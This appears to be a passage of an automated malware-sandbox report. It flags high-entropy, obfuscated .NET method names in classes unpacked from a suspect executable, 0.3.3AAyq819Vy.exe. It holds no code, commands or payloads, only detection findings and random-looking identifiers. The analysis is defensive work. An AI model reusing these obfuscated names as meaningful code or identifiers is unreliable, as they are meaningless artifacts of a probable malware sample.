                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, AZYPNBnO3mDHCwYpu4w.csHigh entropy of concatenated method names: 'KHAnc9Rytk', 'DuPW23BVSNLoFwrAwgUb', 'f03Dy4BVDNX4ObF3uZkw', 'NAbBR8BVfCPufIivlLyU', 'Cc7N74BVIwACCLvBe9fB', 'eLkoCXBV7ocjU7m1vrYu', 'IPy', 'method_0', 'method_1', 'method_2'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, H59UY4h1pn10rLXwn5x.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'AmQBbvC4pi4', 'JnEhRdPtEo', 'imethod_0', 'Hko1I4B2XSwUXZu1EalE', 't5VyeFB2P8OfPYIgEn5Q', 'QMrUmaB2x8edu447ivLX', 'aIuA4VB2ZuPr8VomLNMs'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, kVsQtY1xC0ZxxRYA1kj.csHigh entropy of concatenated method names: 'iUYXb2BJYYi64J0sBI0e', 'yBqxWRBJv56LEAuc0g1o', 'bXkJQvBJNnGaN4ZbYiVn', 'akC1J7TxZJ', 'Mh9', 'method_0', 'A2M1VQiiXF', 'uIs106M7tl', 'Jvn13Nx7BY', 'buo1kxg513'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, KlRO0h2eV7AJEWwGh7b.csHigh entropy of concatenated method names: 'qpV2AtswvX', 'd262vqaxZW', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'ghQ2N6c112', 'method_2', 'uc7'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, Rlc4s1nsJqIMAUQsFGS.csHigh entropy of concatenated method names: 'd5pBecIIvhT', 'UX6namps4r', 'jGwnXlmO6t', 'tTFnPi3dJx', 'yJfbsgBVHDrq9RytU8uq', 't0jv7SBV1uDgBoqswmFj', 'KpWXKIBV6VLyFhKH23Gr', 'RVQqvOBVRdtxeMWhR1RO', 'CRYYJaBV96hrVjOP1Q2j', 'o4Fwt2BVnPVZ2bMeLEOA'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, zdg4PkhOt6IpnbdZGX1.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'IL7BehiJRcf', 'vsbBbBgVvD9', 'bD1XkUB27bHsR66BsKAU', 'HDBLcKB24a0eyDK5rgll', 'lmcfo0B2c85WieVZF8QX', 'Qi9TVCB28LyWLPbepyVf'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, iK6x8nplJYDUeXdMNSF.csHigh entropy of concatenated method names: 'VoLpucXNUG', 'MfOpQMbZrZ', 'Axdp2Sg0Bl', 'UAZpjFhUbu', 'QLcpHhNKYY', 'OXvp16FH22', 'ynrp6EbafE', 'vZUpRimlrb', 'j4kp9hKjdR', 'DPBpnVVqrG'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, apAIfpW2AAIE7nqvUcD.csHigh entropy of concatenated method names: 'kVQW50RsDt', 'bY3Ww20lSl', 'WJX8JaBg5kd5MCbTaQZx', 'nL7cjABgd3yIBVRPcTmS', 'TBwFZ1BgTrtxtobbtP9H', 'qCCgPFBgwPGExPybGmkV', 'LCVWauQZL7', 'HsYtpyBgaIEUvVC62ySV', 'iDjwbBBgXYwMluXujgxC', 'H21SlyBgsNoQaKEl1ExT'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, qsKI1XBCCmeXlUAqm2Q.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'NGiBeB4RyJL', 'vsbBbBgVvD9', 'lmG2eqBtzPa3PeV8Rapp', 'ni6VYxBgFkH4bMhdBJq1', 'fL9yHtBgBwKbmBmLmM4T', 'LnvCxsBgW28sTNiCSLuH'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, t9D1HoV9py79ppWYIty.csHigh entropy of concatenated method names: 'BQXBeKoZRbu', 'UfJBG8GeVsn', 'rsEfIoBkrU48V60Pq6XR', 'v7yYYfBkNGSlWTpPaXXJ', 'CLUdeGBkYmSiZG2pgKHX', 'ounHgtBkMBSxqNRRstZ9', 'D7ZSL3BkUgHg92wIEhcQ', 'lveDxFBkiwrMlPITWs8j', 'uDGeSRBklwqB5lOtMEDw', 'imethod_0'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, eKPdhSK2vF5JmSfD0At.csHigh entropy of concatenated method names: 'method_0', 'HyPKHbwU7T', 'R0NK1a4kCm', 'z8YK6jc9vN', 'kRkKRmGsZL', 'u9UK9RDHjB', 'chqKnjgqBJ', 'gLIhioBmuXoidRXgqPU4', 'ebTc2oBmtFnXQKkNDdX3', 'QDMVrUBmgLYR7YsLLpol'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, rIDODOjSC2BqYJUV8EY.csHigh entropy of concatenated method names: 'PL4Hrg0ewf', 'AuZvc4Bxq7SkU02T0BTf', 'KuYJo3BxpP7hHGSBjnVU', 'JDjQcgBxC1WCbLk0Yhqe', 'kt5', 'zRKj7tEdJy', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, fXp7lqG5b1419J0hlcb.csHigh entropy of concatenated method names: 'eYwG34kLX6', 'AikGkpAKmi', 'fhTGqjLURt', 'F9KTkRBHOsrYOASqprXr', 'YHT25yBHAp0yu5PYHmdu', 'iC44MIBHEELEkBLuZqwX', 'Sr9S5cBHeuboLQhR9Lfb', 'RhYGy9xEpn', 'usDGsZeM7R', 'bHEGmAKKgg'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, zHtZF1etB8Yi7MPQT6H.csHigh entropy of concatenated method names: 'bCTeuMpWdF', 'bAHeQyX0gP', 'XFSe2mecvr', 'gd1ej3DBwe', 'DTOeH0oj69', 'BoRe1CIgTH', 'Xb7ETKB13JlEll6EHmp0', 'lpSqgaB1kHCsbyIg7Zs0', 'aharu8B1qIyKrVYwTVX8', 'ygc6q5B1p1iV9H3UkL4Z'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, jJiAf1toa8x8xy1AQV0.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'xymthtALHf', 'Write', 'h4qtG2jxXN', 'fLFtEtGgNX', 'Flush', 'vl7'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, LmLrE9hyXmNT5PPn4aC.csHigh entropy of concatenated method names: 'hxIhPtMb5F', 'Soe4nRBjOdFkVGa2lqnF', 's9va2hBjEcQYsOqDKiOX', 'eqOq60BjeCDu81rhCS3C', 'PSJDAgBjAayASIt7x3WG', 'vN1opWBjvYjwtYQDEsvs', 'U1J', 'P9X', 'KEXBbU8KOAi', 'qCaBbi4S71Q'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, Al58N732kOrItwneVtY.csHigh entropy of concatenated method names: 'JHa3HHMjid', 'uPP31MDfAb', 'ToD36k62VK', 'GPo3R6SiOh', 'Dispose', 'eWCRXPBq4XZyc85rCDBf', 'gKNIgwBqDqWtlXXFZEPb', 'xTstLVBq7teF4QqxgMFf', 'iI91LTBqc0ahTxoWrw3G', 'exh72yBq8HkTHS3qqOHv'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, bsnLd9gJsIZetF640ZZ.csHigh entropy of concatenated method names: 'LLag04a1Ka', 'UDdg3KGyHL', 'crDgkWns9j', 'Sg6gqGXTQV', 'biNgpNfcfW', 'rDUchtBap79rgTnR4XIJ', 'KAEbCSBakNGiuJK222yl', 'lP3floBaqyUVhAput0AR', 'X2bG3NBaCOXjFiPUXe5j', 'ghySvHBazppP5x06dOhd'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, LnLuPu8V05FNYi6y8hO.csHigh entropy of concatenated method names: 'FDN83N5k6a', 'HHc8klG5dC', 'hBw8q3xgVl', 'DfdRH3BmN58hrZBER71M', 'NCO87cBmAPyYXGR5nJPR', 'aT4FtOBmvqTt40r2tCf2', 'lHXenjBmYEhIbYfSijsV', 'fvp5fmBmrqSIE6sVunEb', 'Ql6lc1BmLs3fgxMhNZur'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, rXIKIlt5hpLfV0UYWn9.csHigh entropy of concatenated method names: 'oBFtpjKS6M', 'vkGtzIrcKj', 'BcZtyiBgYZ', 'GJKtsqR7mD', 'uiUtmnbZ8s', 'zwNta3P0cF', 'CqutXncDq6', 'PmAtPMRU9u', 'P6HtxnwgyK', 'iYDtZSkBqN'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, ClHWXZV2ybTDWrJFBuS.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'KRNVHQSMOD', 'n01ZUgB3TRCPPtuykZQk', 'co4ZnUB35Ska5wbxWmB5', 'wxxNmbB3wFAcyjG5hxWM', 'WNQXbgB3yIq3SD6Whsv4', 'onwmn4B3sjvC86mwlJxd', 'jSMoiiB3mZjMSUmpP80N'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, HmYtZv4ZSpFB0RhGH9K.csHigh entropy of concatenated method names: 'qyf4VY39Ih', 'hL540VjVip', 'H7g43rs6Jk', 'kLj4kR7aPD', 'UZl4q44TVg', 'OOqvXXByzg1Cp9QHm3QD', 'sJ9hyOBypuZ57hQPMh1d', 'lfR5E3ByCmSiG8aZl3GU', 'MuUIZPBsF6vJbEWSlwNK', 'ehcwLqBsBU1XCdlVkrux'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, enAZfvE2nMXWbSsbAWm.csHigh entropy of concatenated method names: 'hW2EHE7BYs', 'YfBE1CXjX6', 'Of8V55BHZx71I2rjvIxm', 'gUAFIyBHJKAoM8NTjf12', 'f5WvlCBHVIL3xnIKeyva', 'CfbI4MBH0tqlsKuOiUHi', 'wgtosWBH3frNAhktQkE2', 'jc0CJkBHkuyYoswMM0P8'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, TrZZsgH6a6kj72ret59.csHigh entropy of concatenated method names: 'Close', 'qL6', 'go1H9xROhM', 'OOqHniCYrC', 'n8CHdiqcj9', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, DUcSpHEfS4moNfpCwS8.csHigh entropy of concatenated method names: 'RmqEgO8qq1', 'AqkeVCBHmBAXVOCWWPAe', 'Ll1WK9BHa2atfjDuIudk', 'LdMM7kBHyIrPLHYjsOxx', 'dBk9uqBHs2hy7Uutc5A4', 'g7mtlTBHXVbGHqd9MBLl', 'TCDup1BHP3JIgg8yj2n1', 'rQRESYJUYc', 'Jm6EDv7yif', 'i57E7tDvil'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, oCY2SlL7HVNOmfawgMX.csHigh entropy of concatenated method names: 'OxlfY74GhX', 'YX3frxy3G5', 'f2mh0SBdZIrop8PPMH7k', 'qYSftDBdP41QoTv5Rqdl', 'EIbAqNBdx3a9DapIn7dg', 'P2g4DmBdJtd7WikhUSsX', 'jiesCeBdVZRhAcxd9LWi', 'CRPfff7IZV', 'FuSEu8Bdq5sIViKWqmUZ', 'vES8xBBd3VBNOureDIKC'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, stwjW6IrY3dA5D2SnIF.csHigh entropy of concatenated method names: 'KUfIIMnRlL', 'gdAd3QBTC2MRIxWkypQx', 'DExJx8BTz9Mt57t16ksa', 'KyPtn5BTq0TISJ6NgREk', 'wiRNBGBTpKRqc0QiZZXM', 'ujIIUweNVc', 'MbaFcYBTZ4TP9eo0eQMg', 'mQIILDBTP0Yv6D3G7eo2', 'KskMGDBTxFkpI8VS2OXo', 'v5naiYBTJNrlGofkpZZk'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, o85UtLpraMtZAmto0dI.csHigh entropy of concatenated method names: 'ae9WhwfC7SI', 'Gj8WhyffnnO', 'WMmswnBp5sARuwVaqMtG', 'YNRRmXBpwK1b9qJiHnE1', 'GcZ3G3BpyvYdAXOoCZWN', 'jUrxk9BpsgDPmeZLxJy9', 'xAZwnlBpm8n1TQTLYWmc'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, twd8kYEO1ytqitJQfSh.csHigh entropy of concatenated method names: 'M1FEv2GgGQ', 'cunENQqH8c', 'VjWkcuBHI0ybRyFSCAKv', 'bDMHe3BHlFcDWabaXRFZ', 'D9ovonBHfDk4rnICpeS6', 'N9LiKpBHSeY3e89E3byw', 'l7AthoBHDQ7EtDs7Qx0x', 'Gbd7RdBH7172Jt787Otx', 'L419m9BH4hnKjw8kxsbZ'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, k3xYrwoKEE61HhWWyfW.csHigh entropy of concatenated method names: 'LO4ow1lmsE', 'cdCoyJjl9N', 'trMostSuLP', 'Jq98FCBuaRbqoF2on8G4', 'DsLEOQBuXutQFnH6lUGu', 'POgBjcBuseb8ME6NTCRf', 'wjCW3cBumd1ZS5hTev4M', 'L3UogGMw21', 'TuPou7yNv4', 'WFdoQNtUY6'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, tXwkxtcy1WO27G0cK0B.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'sK3cmkQWHf', 'TZfcauPwFN', 'Dispose', 'D31', 'wNK'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, x8BYk5eDi6k9Q3Oiq3H.csHigh entropy of concatenated method names: 'cvNe4MRLRi', 'FUAIJBB1wTSZo3jHZudW', 'p2CCEDB1yFtjCMinDDl8', 'QZp49VB1srXm97CfW71X', 'NVvrJIB1mlMosUV3SFwL', 'NF4CWNB1atFmucmpZixM', 'BIsOJ1B1TLq8fjp1MEqY', 'hsUgLCB1542QsrwOTiH2', 'fD95aGB1X9fHQHF0eYhe'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, DjKOdxeiZLQovTeMAYt.csHigh entropy of concatenated method names: 'tNWeIKAo4P', 'DjiCXWB19YhP3jQNPjb6', 'ObPJ4bB16HqfcWeNHD7g', 'TcokS9B1RPWUYrmPjcub', 'dQ1bEdB1noCtR4qaw2oc', 'ONTelcdvsr', 'YcVj3DB1QvfxxRaqGYU8', 'PlQHhkB12gwuZfm9htsm', 'IOdSedB1j5gvQBJLpogs', 'JMEWZBB1g7OfOtpQ5Go3'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, uI0Im2SvXU18gDMi4bJ.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'kKpBeDG4OHN', 'QKCBe7KUeCv', 'sJBfBSBwFe0tW1e4cp3T', 'IwV7nxBwBI0U6nKklj6y', 'VcI8XNBwWiSSOcIdq3i6', 'NpY3nWBwo3Qblw2ci80t', 'etq3vqBwbeuI2571dLcK', 'F6IOxgBwh5uMQEEsfFbM'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, yKQdHRLv1jjwLqb4ANG.csHigh entropy of concatenated method names: 'Dispose', 'JFSLYShZAM', 'np7Lrjny2M', 'rr7LLmJHl4', 'qGkx9DBnWN6KaCHSDbaS', 'GOHn1mBnoMwEwEcc63MX', 'fXprBaBnblFu0YIdMyE6', 'aoFI7oBnhB0Iya8WRw85', 'rP7TcGBnG1p5yU9DnXaT'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, oA2QLi4ABhBPRrPch9X.csHigh entropy of concatenated method names: 'm9I42vxVg7', 'kwG4N4RTcX', 'l4T4YggpdC', 'yX44rYwxWJ', 'nAF4LdF5v0', 'HJ64UfggQD', 'sfT4iPbuLd', 'Gn64MU6cAx', 'ltH4lSmiTS', 'cwk4fyvXeI'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, cXdLKLoxGV0QwOwe0Lf.csHigh entropy of concatenated method names: 'TZZbocFF1v', 'bpvbbc15hs', 'ruXbhGpB9Y', 'DgweLVBQeRPiEs83iEw6', 'ttmoj7BQGpLAkvWspqWW', 'dLIjEnBQEeAVJesshhu4', 'yp0bvsYMpc', 'gsUWWqBQNuocIRiUTYkr', 'KwNb0jBQAGg7c2efeG6S', 'exIh72BQvWIBb9GejW0H'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, OdvTcVMcKLZYX9cm7v.csHigh entropy of concatenated method names: 'tT11gWacO', 'TWeeUsBK2DfhRUHkGSYF', 'gr8DGBBKj4iLmmokSFP2', 'XlggTCBKuoFtQvdmiGZ7', 'xdbtQvBKQcC552atAxC8', 'XerfokBAZ', 'Hj4IH37QQ', 'hr5Sg46Pu', 'qYfD1iDTH', 'jLd7tGC6M'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, ojsYqUBlDcRWPhPNiG3.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'enGBEzQHt6O', 'vsbBbBgVvD9', 'vueIAeBtDlrt41KE6j9S', 'Lg8RAvBt7t5BPDqk8Jm4'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, Buu5PNOr4acgMAQ78hn.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'cPn6hiB65bc6pFSj6Ksr', 'V8RlWMB6wXcV8726Gn3V', 'qqNCW5B6yUePRf9kBMe1', 'WjhZRrB6swIB2hHS4dLa'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, O4Je4PDY6J77dl0QcmP.csHigh entropy of concatenated method names: 'UZ64BSFwmY', 'Hb44kJBy1k4v8SWOkxT0', 'VrPYymByj1ZdGMi330jT', 'oLk3SBByH2a9CU7fJrc2', 'cU2q1UBy6KDRHpDo5SSR', 'z5sDLbBfy8', 'JfKDU0yiQ0', 'bpVDieblkP', 'krQDM7mVj5', 'knWDlTjApT'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, OBJLJsfVH5D7ThnEo4x.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'hwNBeY16Grm', 'rlCBbmU8MKG', 'FPUUnyBTtHAiUUVcKm9r', 'fFKq83BTg6PiPSWC3k1b', 'POCNvHBTutI2grcKfYtj', 'wlOt71BTQcpY6EB1nUMi', 'eU4tcbBT2uCbvI1f0YVb'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, NNnb4gzghdssDB6VLt.csHigh entropy of concatenated method names: 'E8wBB4T0OK', 'j9yBog8C2P', 'lTcBb9EHYl', 'nknBh8tUen', 'vFoBG2VuZG', 'YCKBElrPhi', 'z6pBOegW9v', 'pQ4e7pBtEFjQD1W1sEHm', 'gvBVZ3Btep3X8OFnkdsm', 'DKyGq3BtOt6r1f9P9ioo'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, U5dnxvE5VR0MeFLnbxw.csHigh entropy of concatenated method names: 'qvvE3SoHdg', 'JqvEkdIhtg', 'YZcMoKB1eHeCF1cenjWK', 'wA2syVB1OLm6HWiE8GRO', 'VyjbsfB1AtSYHZjOCjXP', 'ViQEyYqZB4', 'M8aEsEVlSq', 'RCHEmTcjHQ', 'oTMEaYZpl9', 'yFxEXTYbSm'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, P1odymeAyUUZWKNgH3a.csHigh entropy of concatenated method names: 'X8YeNMS8Ub', 'chweYj9AKa', 'CLPerhitae', 'oQFW3VB1D0d4RupnrHuN', 'BRkvGtB17kGDJCj6uoO3', 'Jf1GPkB1I9YO5XCnqjXe', 'jO8ccMB1SCLdMVvauXAX', 'G7BgEoB14dhPfDMDT7jW', 'BI4Xr7B1cxRZ5SSsiiPv', 'nG2AyDB18pLtVAH7GiE5'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, HrFkDehZW16MTWXnhDp.csHigh entropy of concatenated method names: 'huxhqHfN3J', 'vkchpaLpMU', 'gfhhChs4mg', 'A0ShzwRR7v', 'ifRGFXaUfR', 'u87GBQbho6', 'gm6GWUKjDT', 'QnbxClBjIT59xuwSiQTe', 'xP4EatBjSVa7wGbtGuDp', 'pMh4tkBjlEh4HTqEOPoS'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, SrQXFPHxddbtDS4VpSI.csHigh entropy of concatenated method names: 'POpHJK2ZaN', 'k6r', 'ueK', 'QH3', 'zyGHVqRd8u', 'Flush', 'eCqH0U37l4', 'iToH3js6Tp', 'Write', 'YcSHkr5JOB'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, XT9hJbfnKtGNy7CaF9j.csHigh entropy of concatenated method names: 'fWnfmgJaHj', 'Ou9faiLJ48', 'wcTfXBxO0D', 'lfKdufBTMY8V8Uj9m7Mt', 'EitVuZBTlcuWrWMa4sDN', 'uq73hiBTUqa9CHaTrEIR', 'rO3lVoBTie76uyxbMMXQ', 'L61fTaG6EA', 'suof56XBhQ', 'rZhfwDr5c2'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, upNa45QCvs48jrqMkqX.csHigh entropy of concatenated method names: 'G5W2Fg5FJB', 'e512BKfglK', 'Yd7', 'bZm2WcQMGb', 'kQ52ohI2l8', 'osv2b80Lag', 'qCj2htpcS3', 'nJUtGZBxbnVUVWLNaiLH', 'rw5PY0BxW1Uc4iINdXm4', 'EoICrnBxoC4a0h107UHO'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, doxEQiEB5gR2aIxorCJ.csHigh entropy of concatenated method names: 'PQLEo9h1Xn', 'aG4EbrOgY7', 'WYfEhWH2m0', 'RMIYXeBHNjiuXw51jKsk', 'qxqiwyBHYgUZFQSgKQyj', 'WEx5WWBHrQQ4lEEeZqcO', 'a01AF2BHLvDX6Yuci8gO', 'WC0HSEBHUKsRlkVZxUVx', 'rHiAS9BHiUTvweCHpYtn'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, Yuhnvpn2QhnxP4kSHU4.csHigh entropy of concatenated method names: 'rtBnHttrJP', 'UOGn17WDT2', 'Pykn6jKrUY', 'tQHnRaHiv4', 'Mpvn9Rjj4L', 'QshnnBZI1h', 'V50ndY8cEB', 'KABnTqfeTU', 'tT9n5IRT94', 'eANnwYxDAy'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, Uuq7DtemIloFIxNDh00.csHigh entropy of concatenated method names: 'fuue3GotfP', 'Wc33qiB6ibqWULW1vLKt', 'h93aHnB6L7SWmAgt3bKj', 'H8P8QYB6UKbcuQSUNld3', 'yu7GLVB6MNbp61r2iuc7', 'P9X', 'vmethod_0', 'oR8Bbt0eVdt', 'imethod_0', 'tMqCEhB6vvDEN1arN5tJ'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, E8R0v1SUlCEpt5FBll3.csHigh entropy of concatenated method names: 'a7KIKpBw8eyqZsLogDaU', 'FRs1NeBwK7n9ROipX60Y', 'HKZ37jBwtlhMv4w7KSaP', 'BS4ycJBw4l5bTB5QhKI9', 'LYPbpWBwcJACfoZMPTcn', 'method_0', 'method_1', 'kGrSMAbUdQ', 'oMjSl5VVqO', 'JJZSf3ZH8P'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, UOKYr93Y4GeCUG8PEXE.csHigh entropy of concatenated method names: 'ere3UNiNwm', 'qFo3fGbAHj', 'PhJ3DUQZPH', 'JSk372wl8q', 'tK6347rEiL', 'k5h3cVa46e', 'Hw038PwGBH', 'A3J3Khqj1X', 'Dispose', 'wPPq76BqUrB75EhoOXiQ'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, k504KWGctpYSQhovm00.csHigh entropy of concatenated method names: 'BWkG2nEDmR', 'r6rF3cBjs2FLolh7UEpU', 'sLkBcSBjw9sbEfc8rDbk', 'dcrT2DBjyCslCxWD8NdA', 'ryCsqjBjmT3OfLseeKlo', 'VFnrvKBjagArvs97vMUv', 'E94', 'P9X', 'vmethod_0', 'cpZBbIfoW3k'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, WQwxvDu2qTsVtZSHISD.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, ERocErSBIqy2VSvoxMR.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'WBTBefATJMp', 'jN6BeIH8Oss', 'OQSUrDB5mduvL2b8d6MC', 'vH6Yy2B5aIdLQ839CJAq', 'Y1DfjqB5XkPd2Z9EGJfK', 'Mmy1sYB5PW432XoQoDeI', 'EeCEOHB5xocaQJxBbxxS', 'sWExUXB5ZaHWl6pubqs1'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, ySsgcw84l2KLs7TRiVs.csHigh entropy of concatenated method names: 'Ceq88WTotK', 'KJL8K04SAm', 'AwD8tXMdrI', 'hv48gIJE2h', 'GSC8uPqQFu', 'X8cnNdBsplgUhtc3DfxI', 'Scb8p7BsCgIf2bjqJ6nN', 'bHcw3fBszF3dIGKfyqRS', 'GIMdATBmFDxpCfx3cg5Y', 'zFgWwZBmBXStx0Ij5CRv'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, diy53dBrWcwwZvRb3yK.csHigh entropy of concatenated method names: 'OhfBULg7uq', 'u6yBixKfU2', 'mLuBMo6she', 'oxi03oBtMDYM2dybTceA', 'rpSO7JBtU3XFrZBhaEZh', 'MNTfPVBtiAcRQvbpf423', 'PIHk5ABtl4Zx0IusKxlQ', 'Db1rNqBtfIpxOLvenQXZ', 'bUI57cBtIKms8TW0VaOJ'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, GgtHJaKvFofL2SmLirD.csHigh entropy of concatenated method names: 'RVjKYEoRH6', 'vfGKrf3ItW', 'NNaKLNpUX0', 'UanKUHAlOq', 'VmSKiGQVAo', 'u5GRLqBmlC3wZEZUEe4t', 'NKfcODBmiYAcXeZsPhV3', 'sPJnlSBmM0SVBWr80P2Y', 'W3nA0xBmfy4eXResxkIj', 'emjvCFBmINqgTYpY3Fmb'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, zcXqPh0jDp61ulOAYaE.csHigh entropy of concatenated method names: 'mXV01TRbUb', 'oxD06URjZP', 'PK10RWEOdU', 'YOO09OAhuA', 'Gbc0nxXNOh', 'W3T0dL2eNF', 'jMo0TCMh0J', 'q2X05YUClI', 'njJ0wIFQlI', 'EQY0yEnu1g'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, jgMU8ydkacaPJdVHpux.csHigh entropy of concatenated method names: 'TGddpYKBAr', 'SgNdCpDd2v', 'g5Adz7QSsU', 'WQSTFJNNaF', 'gA8TB1gGwI', 'OJKTW1SVo1', 'B33ToGG0F0', 'kYLTbIqaDu', 'BuYThOekDG', 'tKETG5lnWC'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, GxpkAS2qDCGtoMW2Z45.csHigh entropy of concatenated method names: 'SRa2CVfrL4', 'X922zoOCQN', 'njLjFPJwMy', 'CvfjBWfUrR', 'Qt6jWD5LwG', 'aomjo5x7GF', 'Rpx', 'method_4', 'f6W', 'uL1'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, ExdXquO4u8gJok9RQbU.csHigh entropy of concatenated method names: 'nxMkmqB9deBFIFpagiIp', 'ckkiKFB99f1lfimWZI8A', 'a4G5ksB9ncfKPStaV3aV', 'DxeyosB9TXkwkwDupsBc', 'gDLrClChjX', 't0E4hlB9sUdLw7NaWCI7', 'PJexjdB9wGiVb3ZVoPeT', 'G91kbdB9yNYVcJj8KdUI', 'f1KdDvB9mOF5drflgAro', 'vXbPwdB9aS3pgpsVQNfD'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, pShRhQWIa2drSH7qeXP.csHigh entropy of concatenated method names: 'FyQWDZHSl4', 'KpcW7Jl6jh', 'CUe70bBgtJK8nVIA432n', 'BDLYMnBg8VfvCHWpUJJ0', 'iqDaUqBgKdBiMm3CWRj8', 'gXhOcvBggVtnDRe7ietv', 'EEgi0QBgun7DewaoZXdN', 'SUqnP9BgQLVPi5dBmhjO', 'gjr0q9Bg2b4oEIPD4u38', 'RVEKMyBgjdnjAjbeT30m'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, OocJJipdCwaDqopQ3o2.csHigh entropy of concatenated method names: 'UfBBGjcnu7O', 'kQJBGHhRIFf', 'rJlBG17dUdm', 'QHgBG6HI5f0', 'FRqBGRirJAS', 'HMrBG9J1qgw', 'FABBGnlqYUD', 'WpkChgUIUD', 'KsTBGdokLi8', 'eh1BGTEklBP'
